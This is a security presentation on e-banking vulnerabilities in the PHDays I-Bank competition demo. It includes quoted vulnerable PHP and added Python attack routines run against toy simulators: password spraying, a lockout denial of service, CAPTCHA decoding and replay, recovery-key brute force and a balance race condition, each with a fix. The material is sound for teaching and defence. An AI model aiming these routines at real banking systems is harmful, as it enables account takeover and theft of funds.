The document summarizes typical vulnerabilities found in e-banking systems by examining vulnerabilities in a demo remote banking system called PHDays I-Bank. Some vulnerabilities discussed include predictable user identifiers, weak password policies allowing short or dictionary passwords, methods for bypassing account locking and CAPTCHAs, weak password recovery processes, low entropy session identifiers and one-time passwords, and ways to conduct transactions without OTP validation. The document aims to demonstrate how such vulnerabilities could allow unauthorized access to accounts or denial of service attacks on real banking systems.
Typical Vulnerabilities of E-Banking Systems
1. Typical Vulnerabilities of E-Banking Systems
Sergey Scherbel
Dmitry Evteev
Eugenie Potseluevskaya
Positive Technologies
3. Future Now
Vulnerabilities of Remote Banking, as Exemplified by PHDays I-Bank
PHDays I-Bank IS NOT a real remote banking system actually used by any bank.
The system was developed specially for PHDays 2012.
PHDays I-Bank contains vulnerabilities typical of real remote banking systems.
Some of these vulnerabilities are found far too often.
4. Identification
Predictable user identifiers are far more dangerous than they seem!
A PHDays I-Bank identifier consists only of digits, just like most identifiers in actual remote banking systems.
Examples of identifiers: 1000001, 1000002, …
What's wrong with that? We'll explain a bit later.
5. Password Policy
A weak password policy is a problem of all times!
The default password is strong, but the user can change it to a weak one, even one consisting of a single character!
The only thing that gets checked is the length of the password, so we're certain to find something like 1234567 or 12345678.
Checking against a regular expression (required character classes) does not help much either: the remaining problem is dictionary passwords, for example P@ssw0rd.
6. Brute Force?
Brute force against Internet banking? What about security?
Types of protection from brute-force attacks:
Locking accounts
Locking IP addresses
Using CAPTCHA
7. Locking is not the answer!
It's easy to bypass these protection mechanisms.
An account or IP address gets locked after a number of failed authorization attempts (usually 3 or 5).
Predictable and weak identifiers
+ Weak password policy
+ ???????
= Profit!!!!111
8. Locking is not the answer!
Collect identifiers: 1000001, 1000002, 1000003, ...
Choose 1 or 2 passwords.
Match identifiers against passwords, not passwords against identifiers:
1001421:12345678
1002236:12345678
1002313:12345678
...
9. Locking leads to Denial of Service!
After a few failed authentication attempts, the account gets locked.
You can attack a target user.
If you know all the identifiers, you can conduct a large-scale DoS attack.
As a rule, to unlock the account, users have to contact the bank office.
Someone's day might be ruined.
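The two slides above describe the same lockout mechanism used in two ways: bypassed by password spraying (slide 8) and turned into a denial of service (slide 9). The following is an added example, not code from the original deck or from Positive Technologies: a toy login endpoint with the usual "lock after 3 failures" rule, constructed user data with sequential identifiers, and three attacker routines against it. The lockout threshold, identifiers and passwords are assumptions for the demo.

```python
"""Added example (not PHDays I-Bank code): why 'lock after N failures'
neither stops password spraying nor is safe to deploy.

A toy login endpoint enforces the lockout from the slides (3 failed
attempts per account). Identifiers are sequential, as on slide 4.
All user data below is constructed for the demo.
"""
from collections import defaultdict

LOCK_AFTER = 3  # failed attempts per account before it is locked


class ToyBank:
    """Simulates the authentication endpoint of a bank with account lockout."""

    def __init__(self, users):
        self.users = users                      # identifier -> password
        self.failures = defaultdict(int)
        self.locked = set()

    def login(self, identifier, password):
        """Return True on success, False on failure or on a locked account."""
        if identifier not in self.users or identifier in self.locked:
            return False
        if self.users[identifier] == password:
            self.failures[identifier] = 0
            return True
        self.failures[identifier] += 1
        if self.failures[identifier] >= LOCK_AFTER:
            self.locked.add(identifier)
        return False


def identifiers(first=1000001, count=10):
    """Sequential numeric identifiers, exactly like 1000001, 1000002, ..."""
    return [str(first + i) for i in range(count)]


def vertical_attack(bank, identifier, wordlist):
    """Naive approach: many passwords against one identifier. The account is
    locked after LOCK_AFTER tries, so even a correct later guess is refused."""
    for pw in wordlist:
        if bank.login(identifier, pw):
            return pw
    return None


def horizontal_attack(bank, ids, passwords):
    """Slide 8: match identifiers against 1-2 passwords, not passwords
    against identifiers. Each account sees fewer than LOCK_AFTER failures,
    so no lockout fires while every weak account is still found."""
    if len(passwords) >= LOCK_AFTER:
        raise ValueError("that many passwords per account triggers the lockout")
    found = {}
    for pw in passwords:                        # outer loop over passwords
        for ident in ids:                       # inner loop over identifiers
            if ident not in found and bank.login(ident, pw):
                found[ident] = pw
    return found


def lockout_dos(bank, ids):
    """Slide 9: the same lockout used offensively. LOCK_AFTER wrong passwords
    per identifier lock every account in the list."""
    for ident in ids:
        for attempt in range(LOCK_AFTER):
            bank.login(ident, "definitely-wrong-%d" % attempt)
    return sorted(bank.locked)


def demo():
    ids = identifiers()
    # Constructed passwords: most users picked the minimum-length classics.
    users = {i: "12345678" for i in ids}
    users["1000003"] = "password"
    users["1000007"] = "Xk2#9vLp!q"             # the one strong password

    vert = ToyBank(users)
    vertical_attack(vert, "1000003", ["123456", "qwerty", "letmein", "password"])

    horiz = ToyBank(users)
    cracked = horizontal_attack(horiz, ids, ["12345678", "password"])

    dos = ToyBank(users)
    locked = lockout_dos(dos, ids)
    return {
        "vertical_locked_target": "1000003" in vert.locked,
        "horizontal_cracked": len(cracked),
        "horizontal_locked": len(horiz.locked),
        "dos_locked": len(locked),
    }


if __name__ == "__main__":
    print(demo())
```

The vertical run locks the target on the third guess although the fourth word is the real password; the horizontal run recovers nine of ten accounts without a single lockout; the DoS run locks all ten accounts with thirty requests. The lesson is that per-account lockout must be paired with rate limiting keyed on something the attacker cannot spread across (source, device, global failure rate) and with a password policy that removes the 1-2 passwords the spray relies on.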
10. Locking IP Addresses
Locking an IP address is no more prudent.
Most companies put all of their employees behind the same external IP address.
Numerous authentication attempts from it can be treated as a brute-force attempt, thus locking out the IP address of the whole company.
11. CAPTCHA Problems
The same value can be sent repeatedly (replay)
The value is sent in a hidden field of the HTML form
Sending an empty value is possible
Insufficient validation: the check passes if the length is appropriate or certain characters are present
The CAPTCHA is not checked at all when certain request headers are present
12. CAPTCHA Problem in PHDays I-Bank
The value is sent in a hidden field of the HTML form:
// Vulnerable: the hidden field carries the CAPTCHA answer itself,
// 'protected' only by reversible base64 and string-reversal steps
public function encodeCaptchaCode($code) {
    return @base64_encode(@strrev(@base64_encode($code)));
}
The encoding uses no secret and no time-dependent value, so decoding a value is a piece of cake:
PUlUTndVVE0= -> (base64 decode) =ITNwUTM -> (reverse) MTUwNTI= -> (base64 decode) 15052
13. CAPTCHA Problem in PHDays I-Bank
Besides, one and the same value can be sent repeatedly.
So you can conduct a brute-force attack on the account!
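The decoding chain on slide 12 and the replay on slide 13, as an added example that is not part of the original deck or Positive Technologies' code. decode_captcha() is the exact inverse of the encodeCaptchaCode() routine shown above; the login handler, its response strings and the account data are constructed for the demo.

```python
"""Added example (not PHDays I-Bank code): the hidden CAPTCHA field can be
decoded by the client, and a decoded value can then be replayed on every
login attempt.

decode_captcha() inverts encodeCaptchaCode() from slide 12:
  base64_encode(strrev(base64_encode($code)))
The toy login handler and the account data are constructed for the demo.
"""
import base64


def encode_captcha(code):
    """Python port of the PHP encodeCaptchaCode(): b64(reverse(b64(code)))."""
    inner = base64.b64encode(code.encode()).decode()
    return base64.b64encode(inner[::-1].encode()).decode()


def decode_captcha(value):
    """Undo the outer base64, the string reversal and the inner base64.
    No secret, no timestamp and no server-side state is involved, so
    anyone holding the hidden-field value holds the answer."""
    reversed_inner = base64.b64decode(value).decode()
    inner = reversed_inner[::-1]
    return base64.b64decode(inner).decode()


class LoginForm:
    """Toy login handler reproducing the replay weakness: the CAPTCHA token
    from the hidden field is compared with the user's answer but never
    invalidated after use."""

    def __init__(self, users):
        self.users = users            # constructed: identifier -> password
        self.captcha_code = "15052"   # the value from slide 12

    def render(self):
        """Returns the hidden-field value the browser would receive."""
        return encode_captcha(self.captcha_code)

    def submit(self, identifier, password, captcha_token, captcha_answer):
        # Vulnerable: the token is self-describing and is accepted any number
        # of times, so the CAPTCHA check is satisfied by the attacker script.
        if decode_captcha(captcha_token) != captcha_answer:
            return "captcha-failed"
        if self.users.get(identifier) == password:
            return "ok"
        return "bad-credentials"


def brute_force_with_replayed_captcha(form, identifier, wordlist):
    """Fetch the form once, decode the CAPTCHA locally, then reuse the same
    token/answer pair for every guess. Returns (password, attempts)."""
    token = form.render()
    answer = decode_captcha(token)
    attempts = 0
    for pw in wordlist:
        attempts += 1
        if form.submit(identifier, pw, token, answer) == "ok":
            return pw, attempts
    return None, attempts


if __name__ == "__main__":
    print(decode_captcha("PUlUTndVVE0="))
    form = LoginForm({"1000001": "1234567"})
    print(brute_force_with_replayed_captcha(form, "1000001",
                                            ["123456", "qwerty", "1234567"]))
```

A CAPTCHA only adds cost when the server keeps the answer (or an HMAC of it with an expiry) on its side, keyed by a one-time token, and deletes that token on the first submission whether the answer was right or wrong.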
15. Password Recovery: Problems
If password recovery asks for an identifier rather than an e-mail address, the form reveals whether an identifier exists, so all identifiers used in the system can be collected.
16. Password Recovery: Problems
Some users of the I-Bank could recover their passwords via a web form.
For others, the rules provided the only recovery way: to contact a bank office.
'Please contact any office of the PHDays bank for password recovery'
17. Password Recovery: Problems
The key required for password recovery is generated with weak entropy:
private function addDataInTable($login) {
    // Vulnerable: rand(1, 250) leaves only 250 possible keys per login
    $key = md5($login.rand(1, 250));
    ...
}
To guess the key, one needs to go through only 250 values!
Then a new password will be created.
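The 250-value key space above, walked by an attacker, as an added example that is not part of the original deck or Positive Technologies' code. recovery_key() reproduces md5($login.rand(1, 250)) exactly; the RecoveryService class, its endpoint names and the way the key is compared are constructed stand-ins for the server side.

```python
"""Added example (not PHDays I-Bank code): brute-forcing the password
recovery key generated as md5($login . rand(1, 250)).

The server side (RecoveryService) is a constructed stand-in that
reproduces only the weakness shown on slide 17.
"""
import hashlib
import random


def recovery_key(login, r):
    """PHP: md5($login.rand(1, 250)): the login string concatenated with the
    decimal random number, then hex MD5."""
    return hashlib.md5((login + str(r)).encode()).hexdigest()


class RecoveryService:
    """Toy password-recovery backend with the weak key from the slide."""

    def __init__(self, rng=None):
        self.pending = {}              # login -> issued key
        self.rng = rng or random.Random()

    def request_reset(self, login):
        # Vulnerable: only 250 distinct keys exist for a given login.
        self.pending[login] = recovery_key(login, self.rng.randint(1, 250))
        # In the real flow the key is e-mailed; the attacker never sees it.

    def complete_reset(self, login, key, new_password):
        """Sets a new password if the key matches the one issued."""
        if self.pending.get(login) == key:
            del self.pending[login]
            return True
        return False


def candidate_keys(login):
    """All 250 keys the server could possibly have issued for this login."""
    return [recovery_key(login, r) for r in range(1, 251)]


def take_over(service, login, new_password="attacker-chosen"):
    """Request a reset for the victim, then try every candidate key.
    Returns the number of completion requests needed, or None."""
    service.request_reset(login)
    for attempts, key in enumerate(candidate_keys(login), start=1):
        if service.complete_reset(login, key, new_password):
            return attempts
    return None


if __name__ == "__main__":
    print("requests needed:", take_over(RecoveryService(), "1000001"))
```

Two fixes are needed together: the key must come from a CSPRNG with at least 128 bits of entropy (random_bytes(16) in PHP, secrets.token_urlsafe(16) in Python), and the completion endpoint must expire keys and count failed attempts, because a low-entropy key is only exploitable when the server tolerates hundreds of guesses.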
18. Weak Entropy of Session Identifier
If a system uses its own session mechanism, the reliability of the identifiers is crucial.
In PHDays I-Bank identifiers are generated according to a special algorithm:
private function getSpecialHash($password) {
    $hash = sprintf("%u", crc32($password));  // unsigned decimal CRC32 of the password
    if(strlen($hash) > 4) {
        $hash = substr($hash, 0, 4);           // keep only the first 4 digits
    }
    return $hash;
}
19. Weak Entropy of Session Identifier
The session identifier consists of only 4 characters.
All characters are digits, which leaves at most 10,000 possible values.
The session identifier is static: it changes only if the user changes their password.
21. Problems with Privilege Isolation
While a possibility to transfer money from other accounts is extremely rare, a possibility to access other users' data can still be found:
Some systems allow sending messages to the support service on behalf of any user
Others allow editing the payment templates of other users
Such vulnerabilities were not embedded in PHDays I-Bank.
22. One-time Password
One-time passwords are used to protect systems from unauthorized activities (transactions, password change, editing personal data).
An OTP can be requested either once after the initial authentication (login and password) or before each new transaction (or other action).
23. One-Time Password in PHDays I-Bank
PHDays I-Bank had 2 types of OTP:
Emulation of an external device, implemented as the TransactionA class in the code
OTP on scratch cards, implemented as the TransactionB class in the code
24. One-Time Password, Problems
OTP is not requested for transfers of small amounts (for example, up to $100)
One and the same OTP can be sent repeatedly
OTP can be predicted
Some users disable OTP validation (in PHDays I-Bank, transactions without OTP were handled by TransactionC)
The user can skip the OTP validation step and perform the transaction straight away
25. One-Time Password, TransactionA
The OTP is impossible to predict.
However, the OTP validation step can be skipped to perform the transaction straight away!
30. One-Time Password, TransactionC
OTP is not requested: transactions can be completed freely.
In PHDays I-Bank, there were not many users who were not asked for an OTP for a transaction, but some participants got lucky.
31. Actions without OTP
Sometimes an OTP is requested only for transactions, while other actions can be completed without it:
Send a message to the Support Service
Change the password
Change a payment template
Create a payment template
Open a new account
32. Changing Payment Template
Payment templates save time on entering similar data:
Recipient's account
Recipient's name
If an attacker is able to change the template data, they can easily replace the recipient's account with their own.
The user is likely to overlook the change and confirm the transaction.
33. How Was It
20,000 rubles (about $700) was the prize fund.
The day before the competition, participants received the source code of the system and a virtual machine with PHDays I-Bank installed.
Then the participants had 20-30 minutes to use the vulnerabilities they had found.
Automation of the process decided the winning side.
Hyper-threading played a critical role!
34. 2 Tasks to Succeed
The competition could essentially be divided into 2 tasks:
Gaining access to the account:
Simple and dictionary passwords
Weak entropy of the password recovery key
Weak entropy of the session identifier
OTP bypass:
OTP was not requested
The OTP validation step could be skipped
Predictable OTP
35. Distribution of Vulnerabilities
[Pie chart: distribution of accounts by vulnerability: simple password, dictionary password, session ID, recovery key; chart values 100, 52, 30, 18]
36. Distribution of Vulnerabilities
The money was distributed according to a simple principle: the harder it is to gain access, the more money it "costs".
The accounts used for demonstration had weak passwords: 1234567 and password.
The participants' own accounts were also vulnerable: the session identifier had weak entropy.
The most reasonable strategy was to transfer all the other participants' money closer to the end of the competition.
37. HelpDesk
Together with the remote banking system, we implemented an elementary HelpDesk.
HelpDesk is a system for the employees of the bank.
The main idea: if an attacker managed to get into the "restricted-access" system, they would have enough information to hack the entire system.
In practice: the password policy, information on protection mechanisms and even user passwords.
38. HelpDesk in PHDays I-Bank
Discussions that hinted at the details to consider
A link to the system that displayed users with simple passwords
39. HelpDesk, Authentication Bypass
HelpDesk is vulnerable to authentication bypass: you don't need to know the login or the password.
Just send a BankOfficeUser header (which PHP exposes as $_SERVER["HTTP_BANKOFFICEUSER"]) carrying a base64-encoded user ID in each HTTP request:
// Vulnerable: a client-supplied header is trusted as the authenticated user
if(isset($_SERVER["HTTP_BANKOFFICEUSER"])) {
    $userId = base64_decode($_SERVER["HTTP_BANKOFFICEUSER"]);
    $userInfo = $this->user->getUserInfoById($userId);
    $this->user->setupUserInfo($userInfo);
    return $this->user;
}
41. Race condition
If you send a lot of requests, it can lead to a situation where all of them are processed at the same time:
Request N: check for the required amount
Request N + 1: check for the required amount
Request N: deposit
Request N + 1: deposit
Profit! $$$
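The interleaving on the slide reproduced with concurrent threads, beside a handler that makes the check and the debit one atomic step, as an added example that is not part of the original deck or Positive Technologies' code. The balances and request parameters are constructed; the sleep stands in for the time a real database round-trip takes between the check and the update.

```python
"""Added example (not PHDays I-Bank code): the check-then-debit race from
slide 41 reproduced with threads, beside the fix (check and debit as one
atomic step). Balances and request parameters are constructed; the sleep
stands in for the database round-trip between the check and the update.
"""
import threading
import time


class Account:
    def __init__(self, balance):
        self.balance = balance
        self.lock = threading.Lock()


def transfer_racy(src, dst, amount, pause=0.2):
    """Request handler as on the slide: check, then debit/credit, with no
    atomicity between the two. N concurrent requests can all pass the check
    before any of them debits, so the sender goes far below zero."""
    if src.balance < amount:
        return False
    time.sleep(pause)               # window between check and update
    src.balance -= amount
    dst.balance += amount
    return True


def transfer_atomic(src, dst, amount, pause=0.2):
    """Fixed: check and debit under one lock. In SQL terms this is
    SELECT ... FOR UPDATE followed by the UPDATE inside one transaction, or
    a single conditional UPDATE ... SET balance = balance - :a WHERE
    balance >= :a whose affected-row count decides success."""
    with src.lock:
        if src.balance < amount:
            return False
        time.sleep(pause)
        src.balance -= amount
    with dst.lock:
        dst.balance += amount
    return True


def fire_concurrent(handler, src, dst, amount, n):
    """Release n requests at the same instant and count how many succeed."""
    results = []
    barrier = threading.Barrier(n)

    def worker():
        barrier.wait()
        results.append(handler(src, dst, amount))

    threads = [threading.Thread(target=worker) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results)


def demo(n=10):
    racy_src, racy_dst = Account(100), Account(0)
    racy_ok = fire_concurrent(transfer_racy, racy_src, racy_dst, 100, n)
    safe_src, safe_dst = Account(100), Account(0)
    safe_ok = fire_concurrent(transfer_atomic, safe_src, safe_dst, 100, n)
    return {
        "racy_succeeded": racy_ok,
        "racy_sender_balance": racy_src.balance,
        "racy_recipient_balance": racy_dst.balance,
        "atomic_succeeded": safe_ok,
        "atomic_sender_balance": safe_src.balance,
        "atomic_recipient_balance": safe_dst.balance,
    }


if __name__ == "__main__":
    print(demo())
```

Ten simultaneous requests for the full balance all succeed against the racy handler and leave the sender at -900, while the atomic handler lets exactly one through. Rate limiting at the proxy (the nginx mitigation on the next slide) only shrinks the window; the race is closed by the lock or the database transaction.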
42. Race Condition, Nginx
To mitigate the race condition and prevent money from appearing out of nowhere, nginx was configured to block requests arriving too often: the limit was 3 requests per second to the script that executed the transactions.
Nginx was not installed on the virtual machines, so one of the participants found the race condition problem.
Note that rate limiting only narrows the window; the race is closed by making the balance check and the debit one atomic operation (for example, in a single database transaction with a row lock).
43. Business Impact Analysis: How Much Would It Cost?
Assumptions:
I-Bank's capital is 300 million dollars
100,000 clients use online banking services
The average balance on every account is 1,000 dollars
Profit from every client is 500 dollars
Operating cost to change a user's password: $0.15 per password
Reissuing one scratch card costs 15 dollars
46. Business Impact Analysis: Exploitation Probabilities
[Pie chart: distribution of password vulnerabilities, chart values 100, 52, 30, 18, with assumed exploitation probabilities: simple password 90%, dictionary password 90%, session ID 70%, recovery key 50%]
[Pie chart: distribution of OTP vulnerabilities, chart values 80, 80, 40, with assumed exploitation probabilities: external device 90%, scratch cards 90%, no OTP 100%]
47. Business Impact Analysis: Risk Assessment
Risk = Impact x Probability
Probability is 0.54%
Risk = 9% of the capital
A risk level of over 3% of the capital is regarded as critical for a bank!
48. Business Impact Analysis: Make the Right Choice
Forewarned is forearmed
[Chart of costs, in millions of dollars]